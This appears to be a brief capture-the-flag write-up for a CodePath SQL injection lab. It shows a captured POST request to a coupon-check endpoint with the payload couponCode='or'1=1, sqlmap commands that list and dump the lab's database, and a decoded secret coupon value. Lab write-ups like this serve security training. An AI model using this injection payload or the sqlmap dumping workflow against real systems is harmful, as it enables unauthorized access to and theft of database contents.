--- title: SQLi5 --- SQL Challenge5 - https://security.codepath.com/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62/couponCheck.js - And use http://www.jsnice.org/ POST /challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck HTTP/1.1 Host: security.codepath.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 18 Origin: https://security.codepath.com DNT: 1 Connection: close Referer: https://security.codepath.com/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.jsp Cookie: JSESSIONID=1A7109000002BFD84A5790CC07BCF4B9; token=81750085213634344965054547426944321234; JSESSIONID3="Lan0jXkvMvkfLpRz6s+amA==" couponCode='or'1=1 - Copy all request and save to your laptop - SO now we know that its kinda working for sqli and all we need is a powerful tool such as sqlmap - On kali : Pre installed, run sqlmap - Sqlmap -r testing - Sqlmap -r testing --dbs - Sqlmap -r testing --dump tables -D SQLiC5Shop - Decode : spcil/|Pse3cr3etCouponStu.f4rU176 Videos